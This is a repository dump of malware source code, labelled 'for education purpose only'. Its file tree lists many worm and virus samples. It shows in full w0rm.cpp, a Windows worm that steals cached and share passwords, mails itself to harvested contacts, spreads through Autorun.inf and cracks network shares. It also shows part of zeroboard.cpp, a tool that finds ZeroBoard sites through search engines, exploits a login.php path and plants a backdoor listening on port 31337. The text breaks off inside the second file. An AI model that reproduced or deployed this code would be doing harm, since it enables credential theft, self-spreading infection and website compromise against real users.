├── README.md ├── Worm └── w0rm.cpp ├── ZeroBoard └── zeroboard.cpp ├── velasco ├── Marcos Velasco Security.url ├── marcos │ ├── group │ │ ├── bld.inf │ │ ├── marcos.mmp │ │ └── marcos.pkg │ ├── inc │ │ └── marcos.h │ └── src │ │ └── marcos.cpp ├── readme.txt └── velasco │ ├── group │ ├── ABLD.BAT │ ├── bld.inf │ ├── velasco.mmp │ ├── velasco.pkg │ └── velasco.rss │ ├── inc │ ├── bluetooth.h │ ├── file.h │ ├── header.h │ ├── resource.h │ ├── velascoapplication.h │ ├── velascoappui.h │ ├── velascocopyfiles.h │ └── velascodocument.h │ └── src │ ├── bluetooth.cpp │ ├── file.cpp │ ├── velasco.cpp │ ├── velascoapplication.cpp │ ├── velascoappui.cpp │ ├── velascocopyfiles.cpp │ └── velascodocument.cpp ├── virus miei ├── distraction │ ├── windows_vista_xp_2000_nt_me_98_serial_generator.au3 │ └── windows_vista_xp_2000_nt_me_98_serial_generator.exe ├── kaboom │ └── Kaboom.cpp └── mystic │ ├── windows vista key generation.au3 │ └── windows vista key generation.exe ├── wrathrage ├── Debug │ ├── BuildLog.htm │ ├── OMBUDSMN.ASP │ ├── Project.ilk │ ├── Project.pdb │ ├── b64.obj │ ├── b64decode.obj │ ├── project.obj │ ├── vc70.idb │ └── vc70.pdb ├── Project.ncb ├── Project.sln ├── Project.suo ├── Project.vcproj ├── UpgradeLog.XML ├── _UpgradeReport_Files │ ├── Thumbs.db │ ├── UpgradeReport.css │ ├── UpgradeReport.xslt │ ├── UpgradeReport_Minus.gif │ └── UpgradeReport_Plus.gif ├── b64.cpp ├── b64decode.cpp ├── msgrua.h ├── msgruaid.h ├── project.cpp └── project.h ├── yahasux └── yahasux.c ├── yourdoom ├── Icon_1.ico ├── icon.ico ├── main.cpp ├── program.dev ├── readme.txt ├── text.ico └── vssver2.scc └── zotob └── Zotob Code └── RELEASE ├── Cback.asm ├── PnP.asm ├── make.bat ├── shellcode.asm └── zotob.zip /README.md: -------------------------------------------------------------------------------- 1 | ######################### 2 | For education purpose only 3 | Virus source code 4 | ########################## 5 | malware code 6 | 
-------------------------------------------------------------------------------- /Worm/w0rm.cpp: -------------------------------------------------------------------------------- 1 | // ---[ w0rm.cpp ]-----------------------------[ http://harmony.haxors.com ]--// 2 | // 3 | // An exploration into remote network propagation using multiple techniques. 4 | // The w0rm will spread via e-mail (MAPI), all local drives and any writable 5 | // network shares. It collects passwords on the local system to be used in 6 | // cracking any password protected shares on the network. It will write an 7 | // Autorun.inf file in the root of any drives it can so when you open that 8 | // drive, e.g. double click it, the w0rm will execute and go resident :). 9 | // This code is obviously buggy and not intended to be actually used in the 10 | // 'real' world. To determine if the payload should be deployed the w0rm 11 | // sits on the network and plays a 'game' with other w0rms on that network 12 | // segment via broadcast UDP messages. See the relevant source for a proper 13 | // idea of the 'game', it's just a perverse example of too much time on one's 14 | // hands :). This is version 1.00 so there are bugs, incompatibilities with 15 | // various flavors of Windows and other anomalies - dose! 
but if you want 16 | // something better write it yourself ;) (and send me a copy) 17 | // 18 | // "this is the end, beautiful friend" - the doors 19 | // 20 | // ---[ harmony :: temple of the screaming interrupt ]--[ nomelody@gmx.net ]--// 21 | 22 | //--header-files--------------------------------------------------------------// 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #include 30 | //--defines-------------------------------------------------------------------// 31 | #define MAX_LENGTH 128 32 | #define MAX_RECIEVERS 50 33 | #define MUTEX_NAME "w0rm" 34 | #define EARTH_WORM_JIM "Readme.exe" 35 | 36 | #define WORMGAME_PORT 12345 37 | #define WORMGAME_MAX_WINS 10 38 | #define WORMGAME_PKT_PLAY 0xFF 39 | #define WORMGAME_PKT_WIN 0x80 40 | //--globals-------------------------------------------------------------------// 41 | char *ptrEgo, *buf; 42 | char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH]; 43 | int index = 0; 44 | 45 | typedef struct tagPASSWORD_CACHE_ENTRY { 46 | WORD cbEntry; 47 | WORD cbResource; 48 | WORD cbPassword; 49 | BYTE iEntry; 50 | BYTE nType; 51 | BYTE abResource[1]; 52 | } PASSWORD_CACHE_ENTRY; 53 | 54 | typedef struct WormGamePkt { 55 | BYTE pktType; 56 | int pktNum; 57 | } AWORMGAMEPACKET; 58 | //--function-declarations-----------------------------------------------------// 59 | DWORD WINAPI WormGameThread( LPVOID ); 60 | DWORD WINAPI WormMainThread( LPVOID ); 61 | 62 | BOOL runningNT(); 63 | void propogateMAPI( void ); 64 | int initMAPI( void ); 65 | int validAddress( char * addr ); 66 | int sendMessage( int recipNum, LHANDLE lhSession ); 67 | int getSharePasswords( void ); 68 | int getCachedPasswords( void ); 69 | int addPassword( char * pwd ); 70 | void propogateDrive( void ); 71 | void attackDrive( char * drive, int type ); 72 | void propogateNet( LPNETRESOURCE lpnr ); 73 | int crackNetShare( char * share ); 74 | void releasePayload(); 75 | 76 | extern "C" int __stdcall 
RegisterServiceProcess( int dwProcessID, int dwType ); 77 | //--entry-point---------------------------------------------------------------// 78 | // WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) 79 | int main( int argc, char **argv ) 80 | { 81 | HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread; 82 | DWORD WormGameThreadId, WormMainThreadId; 83 | 84 | // display explorer window if we need to, due to autorun.inf file :) 85 | // test for any command line... 86 | 87 | /* only allow one instance of worm to run on system at one time */ 88 | hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME); 89 | if( GetLastError() == ERROR_ALREADY_EXISTS ) 90 | { 91 | ExitProcess( 0 ); 92 | } 93 | 94 | ptrEgo = argv[0]; 95 | 96 | /* try to 'hide' the process */ 97 | if( runningNT() == TRUE ) 98 | { 99 | // hide process in winNT 100 | printf("WORM running on WinNT\n"); 101 | } else { 102 | printf("WORM running on Win9x\n"); 103 | LoadLibrary( "KERNAL32.DLL" ); 104 | RegisterServiceProcess( NULL, 1); 105 | } 106 | 107 | /* go resident and give worm RAW power */ 108 | hEgo = GetCurrentProcess(); 109 | SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS); 110 | 111 | // create suspended WormMainThread... 112 | hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId); 113 | if( hWormMainThread != NULL ) 114 | { 115 | // set thread to time critical... 'i wana take you higher' - sly and the family stone 116 | //SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL); 117 | // resume thread execution... 118 | ResumeThread( hWormMainThread ); 119 | } 120 | /* 121 | // create suspended WormGameThread... 122 | hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId); 123 | if( hWormGameThread != NULL ) 124 | { 125 | // resume thread execution... 
126 | ResumeThread( hWormGameThread ); 127 | } 128 | */ 129 | /* wait for hWormGameThread() to terminate */ 130 | // WaitForSingleObject( hWormGameThread, INFINITE); 131 | WaitForSingleObject( hWormMainThread, INFINITE); 132 | 133 | printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n"); 134 | getch(); 135 | 136 | /* release our mutex, next local worm wont get blocked */ 137 | if( hMutex != NULL ) 138 | { 139 | ReleaseMutex( hMutex ); 140 | } 141 | return 0; 142 | } 143 | 144 | //----------------------------------------------------------------------------// 145 | DWORD WINAPI WormMainThread( LPVOID ) 146 | { 147 | DWORD dwSize; 148 | char buff[64]; 149 | printf("WormMainThread: started...\n"); 150 | /* spread worm via MAPI */ 151 | propogateMAPI(); 152 | /* get any passwords we can for use later on */ 153 | getSharePasswords(); 154 | getCachedPasswords(); 155 | dwSize = 64; 156 | WNetGetUser( NULL, buff, &dwSize ); 157 | addPassword( buff ); 158 | printf("DEBUG: total pwds got = %d\n", index); 159 | /* spread worm via any/all localy maped drives */ 160 | propogateDrive(); 161 | /* spread worm via any/all LAN network shares */ 162 | propogateNet( NULL ); 163 | /* finished our little game :) */ 164 | ExitThread( 0 ); 165 | return 0; 166 | } 167 | //----------------------------------------------------------------------------// 168 | DWORD WINAPI WormGameThread( LPVOID ) 169 | { 170 | 171 | WSADATA w; 172 | SOCKET s_recv, s_send; 173 | sockaddr_in saddr, saddr_in, saddr_out; 174 | int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval; 175 | AWORMGAMEPACKET gamePkt; 176 | fd_set fd_read; 177 | struct timeval timeout = { 5, 0 }; 178 | 179 | if( WSAStartup( MAKEWORD(1,0), &w) != 0 ) 180 | { 181 | printf("WormThread: WSAStartup failed\n"); 182 | goto endThread; 183 | } 184 | 185 | s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP); 186 | s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP); 187 | if( s_recv == INVALID_SOCKET || s_send 
== INVALID_SOCKET ) 188 | { 189 | printf("WormThread: invalid socket\n"); 190 | goto endThread; 191 | } 192 | 193 | memset( &saddr_in, 0x00, sizeof( struct sockaddr)); 194 | 195 | memset( &saddr, 0x00, sizeof( struct sockaddr)); 196 | saddr.sin_family = AF_INET; 197 | saddr.sin_port = htons( WORMGAME_PORT ); 198 | saddr.sin_addr.s_addr = INADDR_ANY; 199 | 200 | memset( &saddr_out, 0x00, sizeof( struct sockaddr) ); 201 | saddr_out.sin_family = AF_INET; 202 | saddr_out.sin_port = htons( WORMGAME_PORT ); 203 | saddr_out.sin_addr.s_addr = INADDR_BROADCAST; 204 | 205 | optval = 1; 206 | if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR ) 207 | { 208 | printf("WormThread: setsocketopt failed\n"); 209 | goto endThread; 210 | } 211 | 212 | if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR ) 213 | { 214 | printf("WormThread: bind failed\n"); 215 | goto endThread; 216 | } 217 | 218 | FD_ZERO( &fd_read ); 219 | FD_SET( s_recv, &fd_read ); 220 | randomize(); 221 | loop: 222 | while( 1 ) 223 | { 224 | if( totalwins >= WORMGAME_MAX_WINS ) 225 | { 226 | releasePayload(); 227 | totalwins = 0; 228 | } 229 | // pick a magic number... 230 | magicWorm = ( ( rand() % 100 ) + 1 ); 231 | printf("WormThread: picked a magic num: %d\n", magicWorm); 232 | // wait a length of time... 233 | Sleep( 500 ); 234 | // send my magic number... 235 | gamePkt.pktType = WORMGAME_PKT_PLAY; 236 | gamePkt.pktNum = magicWorm; 237 | if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR ) 238 | { 239 | printf("WormThread: sendto failed\n"); 240 | break; 241 | } 242 | 243 | // handel responces... 
244 | while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR ) 245 | { 246 | if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR ) 247 | { 248 | printf("WormThread: recvfrom failed\n"); 249 | break; 250 | } else { 251 | switch( gamePkt.pktType ) 252 | { 253 | case WORMGAME_PKT_PLAY: // recieved a magic number... 254 | // ignore responce from local machine... 255 | printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum); 256 | // process other responces 257 | if( gamePkt.pktNum == magicWorm ) 258 | { 259 | // notify any winners 260 | gamePkt.pktType = WORMGAME_PKT_WIN; 261 | saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr; 262 | sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size); 263 | saddr_out.sin_addr.s_addr = INADDR_BROADCAST; 264 | } 265 | break; 266 | case WORMGAME_PKT_WIN: // im a winner :) 267 | printf("WormThread: IM A WINNER!!!\n"); 268 | totalwins++; 269 | goto loop; 270 | default: // its all gone bugfuck! 271 | printf("WormThread: its all gone bugfuck!\n"); 272 | break; 273 | } 274 | } 275 | } // while(select... 276 | } 277 | endThread: 278 | closesocket( s_recv ); 279 | closesocket( s_send ); 280 | ExitThread( 0 ); 281 | return 0; 282 | } 283 | //----------------------------------------------------------------------------// 284 | BOOL runningNT() 285 | { 286 | OSVERSIONINFO osvi; 287 | BOOL retval = FALSE; 288 | 289 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 290 | GetVersionEx(&osvi); 291 | switch( osvi.dwPlatformId ) 292 | { 293 | case VER_PLATFORM_WIN32_NT: 294 | retval = TRUE; 295 | break; 296 | case VER_PLATFORM_WIN32_WINDOWS: 297 | retval = FALSE; 298 | break; 299 | default: // VER_PLATFORM_LINUX ? 
:) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE 300 | retval = FALSE; 301 | break; 302 | } 303 | return retval; 304 | } 305 | //----------------------------------------------------------------------------// 306 | void propogateMAPI( void ) 307 | { 308 | LHANDLE lhSession; 309 | CHAR rgchMsgID[513]; 310 | MapiMessage *lpMessage; 311 | int i=0; 312 | if( initMAPI() != 0 ) 313 | { 314 | return; 315 | } 316 | if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS) 317 | { 318 | *rgchMsgID = NULL; 319 | while( i < MAX_RECIEVERS ) 320 | { 321 | if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS) 322 | { 323 | break; 324 | } 325 | if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS) 326 | { 327 | // printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress); 328 | if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 ) 329 | { 330 | strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress); 331 | i++; 332 | } 333 | if( validAddress( lpMessage->lpRecips->lpszAddress ) == 0 ) 334 | { 335 | strcpy( addressList[i], lpMessage->lpRecips->lpszAddress); 336 | i++; 337 | } 338 | } 339 | 340 | } 341 | MAPIFreeBuffer( lpMessage ); 342 | 343 | // TO DO: sort addressList and remove duplicates... 344 | 345 | //sendMessage( i, lhSession ); // <---- !!!!!! 
346 | 347 | MAPILogoff( lhSession, 0L, 0L, 0L); 348 | } 349 | for( int x = 0 ; x < i ; x++ ) 350 | { 351 | printf("DEBUG: attacking:\t%s\n", addressList[x]); 352 | } 353 | return; 354 | } 355 | //----------------------------------------------------------------------------// 356 | int initMAPI( void ) 357 | { 358 | HINSTANCE hi; 359 | LPMAPILOGON MAPILogon; 360 | LPMAPIFINDNEXT MAPIFindNext; 361 | LPMAPIREADMAIL MAPIReadMail; 362 | LPMAPISENDMAIL MAPISendMail; 363 | hi = LoadLibrary( "mapi32.dll" ); 364 | if( hi == NULL ) 365 | { 366 | return -1; 367 | } 368 | MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon"); 369 | MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext"); 370 | MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail"); 371 | MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail"); 372 | if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL ) 373 | { 374 | return -1; 375 | } 376 | return 0; 377 | } 378 | //----------------------------------------------------------------------------// 379 | int validAddress( char * addr ) 380 | { 381 | if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0) 382 | { 383 | return -1; 384 | } else if( strchr( addr , '@') == NULL ) 385 | { 386 | return -1; 387 | } else if( strchr( addr , '.') == NULL ) 388 | { 389 | return -1; 390 | } else { 391 | return 0; 392 | } 393 | } 394 | //----------------------------------------------------------------------------// 395 | int sendMessage( int recipNum, LHANDLE lhSession ) 396 | { 397 | MapiRecipDesc *recips = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) ); 398 | MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL}; 399 | for( int i=0 ; iabResource+x->cbResource, x->cbPassword); 420 | buf[x->cbPassword] = 0; 421 | addPassword( buf ); 422 | return 0; 423 | } 424 | //----------------------------------------------------------------------------// 425 | int 
getCachedPasswords( void ) 426 | { 427 | buf = new char[1024]; 428 | HINSTANCE hi = LoadLibrary("mpr.dll"); 429 | if( hi == NULL ) 430 | { 431 | return -1; 432 | } 433 | WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords"); 434 | if( enp == NULL ) 435 | { 436 | return -1; 437 | } 438 | enp( 0, 0, 0xff, pce, 0); 439 | FreeLibrary( hi ); 440 | return 0; 441 | } 442 | //----------------------------------------------------------------------------// 443 | BYTE rotr( BYTE b ) 444 | { 445 | BYTE carry; 446 | carry = b & 0x01; 447 | carry <<= 7; 448 | b >>= 1; 449 | b |= carry; 450 | return b; 451 | } 452 | //----------------------------------------------------------------------------// 453 | void decodePW( char * pw ) 454 | { 455 | BYTE hash = 0x35; 456 | while( pw && *pw ) 457 | { 458 | *pw = *pw ^ hash; 459 | pw++; 460 | hash = rotr( hash ); 461 | } 462 | } 463 | //----------------------------------------------------------------------------// 464 | int addPassword( char * pwd ) 465 | { 466 | if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) ) 467 | { 468 | strcpy( passwordList[ index ], pwd); 469 | printf("DEBUG: ADDED: %s\n", passwordList[ index ]); 470 | index++; 471 | } 472 | return 0; 473 | } 474 | //----------------------------------------------------------------------------// 475 | int getSharePasswords( void ){ 476 | if( runningNT() == FALSE ) 477 | { 478 | HKEY key, subkey; 479 | DWORD i, maxKeys, len, junk; 480 | char keyName[256], wrightPwd[256], readPwd[256]; 481 | RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key); 482 | RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL); 483 | if( maxKeys != 0 ) 484 | { 485 | for( i=0; i 0 && length < MAX_LENGTH) 519 | { 520 | for( int i=0 ; i<=(length/4) ; i++ ) 521 | { 522 | switch( GetDriveType( ptr ) ) 523 | { 524 | 
case DRIVE_FIXED: 525 | // The drive is a local drive. 526 | printf("DRIVE_FIXED: %s\n", ptr); 527 | attackDrive( ptr, 1 ); 528 | break; 529 | case DRIVE_REMOTE: 530 | // The drive is a network drive. 531 | printf("DRIVE_REMOTE: %s\n", ptr); 532 | attackDrive( ptr, 1 ); 533 | break; 534 | default: 535 | break; 536 | } 537 | *ptr+=1; 538 | } 539 | } 540 | return; 541 | } 542 | //----------------------------------------------------------------------------// 543 | void attackDrive( char * drive, int type ) 544 | { 545 | FILE *fpAutorun; 546 | char buff[MAX_LENGTH]; 547 | // copy worm to drive, Attribute = hidden 548 | if( type == 1 ) 549 | { 550 | sprintf( buff, "%s%s", drive, EARTH_WORM_JIM); 551 | } else { 552 | sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM); 553 | } 554 | printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff); 555 | /* if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 ) 556 | { 557 | // create an Autorun.inf file on drive, Attribute = hidden 558 | sprintf( buff, "%sAutorun.inf", drive); 559 | fpAutorun = fopen(buff, "w"); 560 | if( fpAutorun != NULL ) 561 | { 562 | fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM); 563 | fclose( fpAutorun ); 564 | _rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY); 565 | } 566 | } */ 567 | return; 568 | } 569 | //----------------------------------------------------------------------------// 570 | void propogateNet( LPNETRESOURCE lpnr ) 571 | { 572 | DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF; 573 | HANDLE hEnum; 574 | LPNETRESOURCE lpnrLocal; 575 | dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum); 576 | if( dwResult != NO_ERROR ) 577 | { 578 | return; 579 | } 580 | do 581 | { 582 | lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer); 583 | dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer); 584 | if ( dwResultEnum == NO_ERROR ) 585 | { 586 | for( DWORD i = 0; i < cEntries; i++ ) 587 | { 588 | if( 
RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) ) 589 | { 590 | propogateNet( &lpnrLocal[i] ); 591 | } else if( RESOURCETYPE_DISK == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) ) 592 | { 593 | if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD ) 594 | { 595 | // try all found password/username combinations... 596 | printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName ); 597 | if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 ) 598 | { 599 | attackDrive( lpnrLocal[i].lpRemoteName, 0 ); 600 | WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE); 601 | } 602 | } else { 603 | attackDrive( lpnrLocal[i].lpRemoteName, 0 ); 604 | WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE); 605 | printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName ); 606 | } 607 | } 608 | } 609 | } else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) { 610 | break; 611 | } 612 | } while( dwResultEnum != ERROR_NO_MORE_ITEMS ); 613 | GlobalFree( (HGLOBAL) lpnrLocal ); 614 | WNetCloseEnum( hEnum ); 615 | return; 616 | } 617 | //----------------------------------------------------------------------------// 618 | int crackNetShare( char * share ) 619 | { 620 | int retval = 0; 621 | for( int i=0 ; i 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #ifdef __sun__ 21 | #include 22 | #endif /* __SunOS__ */ 23 | 24 | #define DEBUG_ING 25 | #undef DEBUG_ING 26 | 27 | #define TMP_FILE "./tmp.core" 28 | #define CMD_FILE "./cmd.core" 29 | #define PRC_FILE "./proc.core" 30 | #define SCS (0) 31 | #define MIN (1) 32 | 33 | #ifdef __linux__ 34 | #define DEF_ETH "eth0" 35 | #else 36 | #ifdef __FreeBSD__ 37 | #define DEF_ETH "ed0" 38 | #else 39 | #ifdef __sun__ 40 | #define DEF_ETH "hme0" 41 | #endif 42 | #endif 43 | #endif 44 | 45 | #define MAX_BUF (0x0000ffff) 46 | #define FIR_BUF (0x00000800) 47 | #define 
SEC_BUF (0x00000400) 48 | #define THR_BUF (0x00000200) 49 | #define MIN_BUF (0x00000100) 50 | 51 | #define VENDOR "nzeo.com" 52 | 53 | // search rule 54 | #define FD_RULE_0 "/zboard/zboard.php" 55 | #define FD_RULE_1 "/zb41/zboard.php" 56 | #define FD_RULE_2 "/bbs/zboard.php" 57 | #define FD_RULE_3 "/zb/zboard.php" 58 | #define FD_RULE_4 "/zb40/zboard.php" 59 | #define FD_RULE_5 "/board/zboard.php" 60 | #define FD_RULE_6 "zboard.php" 61 | #define FD_RULE_7 "zboard.ph" 62 | 63 | // pattern 64 | #define FD_PATH_0 "/zboard/skin/zero_vote/login.php" 65 | #define FD_PATH_1 "/zb41/skin/zero_vote/login.php" 66 | #define FD_PATH_2 "/bbs/skin/zero_vote/login.php" 67 | #define FD_PATH_3 "/zb/skin/zero_vote/login.php" 68 | #define FD_PATH_4 "/zb40/skin/zero_vote/login.php" 69 | #define FD_PATH_5 "/board/skin/zero_vote/login.php" 70 | #define FD_PATH_6 "/skin/zero_vote/login.php" 71 | 72 | #define RESULT_OK "200 OK" 73 | #define MAKE_STR1 "BACKDOOR MAKE SUCCESS" 74 | #define MAKE_STR2 "ZBCODE MAKE SUCCESS" 75 | #define DELT_STR1 "BACKDOOR DELETE SUCCESS" 76 | #define DELT_STR2 "ZBCODE DELETE SUCCESS" 77 | 78 | #define DEF_PORT (31337) 79 | #define CONN_PORT (80) 80 | #define DEF_TIME (20) 81 | 82 | int set_sock(char *sc_gt_host,int port,int type); 83 | void re_connt_lm(int st_sock_va,int type); 84 | int proc_r(); 85 | void t_kill(); 86 | void sf_exit(); 87 | int g_ip(char *ip); 88 | int make_cmd_file(); 89 | int filter_f(char *test_bf,int tnum); 90 | 91 | int sock; 92 | 93 | struct tg_rl 94 | { 95 | int r_num; 96 | char *r_str; 97 | char *url_str; 98 | }; 99 | 100 | #define TARGET_NUM (7) 101 | #define SEARCH_NUM (4) 102 | 103 | struct tg_rl __tg_rule_va[]= 104 | { 105 | {0,FD_RULE_0,FD_PATH_0}, 106 | {1,FD_RULE_1,FD_PATH_1}, 107 | {2,FD_RULE_2,FD_PATH_2}, 108 | {3,FD_RULE_3,FD_PATH_3}, 109 | {4,FD_RULE_4,FD_PATH_4}, 110 | {5,FD_RULE_5,FD_PATH_5}, 111 | {6,FD_RULE_6,FD_PATH_6}, 112 | {7,FD_RULE_7,FD_PATH_6}, 113 | {8,NULL,NULL} 114 | }; 115 | 116 | struct search_rule 117 | { 
118 | int num; 119 | u_char *url; 120 | int maxnum; 121 | int defnum; 122 | u_char *http_head; 123 | }; 124 | 125 | struct search_rule search_va[]= 126 | { 127 | {0,"www.google.com",990,10,"http://"}, 128 | {1,"kr.search.yahoo.com",990,15,"http://"}, 129 | {2,"search.nate.com",480,10,"http://"}, 130 | {3,"search.lycos.com",990,10,"//"}, 131 | {4,"kr.altavista.com",1000,10,"//"}, 132 | {5,NULL,0,0,NULL} 133 | }; 134 | 135 | void t_kill() 136 | { 137 | #ifdef DEBUG_ING 138 | fprintf(stdout,"time out\n"); 139 | #endif 140 | close(sock); 141 | sock=-1; 142 | signal(SIGALRM,SIG_DFL); 143 | return; 144 | } 145 | 146 | void sf_exit() 147 | { 148 | #ifdef DEBUG_ING 149 | fprintf(stdout,"safe exit\n"); 150 | #endif 151 | close(sock); 152 | kill((int)proc_r(),9); 153 | unlink(TMP_FILE); 154 | unlink(CMD_FILE); 155 | unlink(PRC_FILE); 156 | exit(-1); 157 | } 158 | 159 | int main(int argc,char *argv[]) 160 | { 161 | FILE *fp; 162 | 163 | int tnum=(SCS); 164 | int chk=(SCS); 165 | int gogo=(SCS); 166 | int whgl=(SCS); 167 | int qnum=(SCS); 168 | int tgrl_sl=(MIN); 169 | int _conn_num=(SCS); 170 | int port=(CONN_PORT); 171 | int def_port=(DEF_PORT); 172 | int sc_gt_sock; 173 | int host_chk=(SCS); 174 | 175 | u_char *gg_ptr=NULL; 176 | u_char *t_ptr=NULL; 177 | u_char __zr_bf[(MAX_BUF)]; 178 | u_char *port_ptr=NULL; 179 | 180 | char pkt[(FIR_BUF)]; 181 | char host[(SEC_BUF)]; 182 | char url[(SEC_BUF)]; 183 | char test_bf[(MAX_BUF)]; 184 | char req_t_bf[(THR_BUF)]; 185 | char ip[(MIN_BUF)]; 186 | char atk_code[(MIN_BUF)]; 187 | 188 | signal(SIGINT,sf_exit); 189 | signal(SIGTSTP,sf_exit); 190 | 191 | while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF) 192 | { 193 | extern char *optarg; 194 | switch(whgl) 195 | { 196 | case 'S': 197 | case 's': 198 | tnum=atoi(optarg); 199 | if(SEARCH_NUM') 376 | chk=0; 377 | } 378 | else { 379 | if(t_ptr[gogo]==' ') 380 | continue; 381 | else if(t_ptr[gogo]=='<') 382 | chk=1; 383 | else test_bf[whgl++]=t_ptr[gogo]; 384 | } 385 | } 386 | 
387 | if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str)) 388 | continue; 389 | else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str); 390 | 391 | if(t_ptr!=NULL) 392 | t_ptr[0]='\0'; 393 | else continue; 394 | 395 | if(filter_f(test_bf,tnum)) 396 | { 397 | t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head); 398 | if(strstr(t_ptr,search_va[tnum].http_head)) 399 | continue; 400 | 401 | memset((char *)host,0,sizeof(host)); 402 | memset((char *)url,0,sizeof(url)); 403 | 404 | chk=(SCS); 405 | 406 | if(strstr(test_bf,search_va[tnum].http_head)) 407 | { 408 | t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head); 409 | port=(CONN_PORT); 410 | 411 | for(whgl=0;whglh_addr); 516 | memset(&(sock_st.sin_zero),0,8); 517 | 518 | if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1) 519 | { 520 | close(sock); 521 | return(-1); 522 | } 523 | return(sock); 524 | } 525 | else{ 526 | if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) 527 | { 528 | return(-1); 529 | } 530 | 531 | sock_st.sin_family=(AF_INET); 532 | sock_st.sin_port=htons(port); 533 | sock_st.sin_addr.s_addr=(INADDR_ANY); 534 | memset(&(sock_st.sin_zero),0,8); 535 | 536 | if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1) 537 | { 538 | close(sc_gt_sock); 539 | return(-1); 540 | } 541 | #define BK_LG 10 542 | if(listen(sc_gt_sock,(BK_LG))==-1){ 543 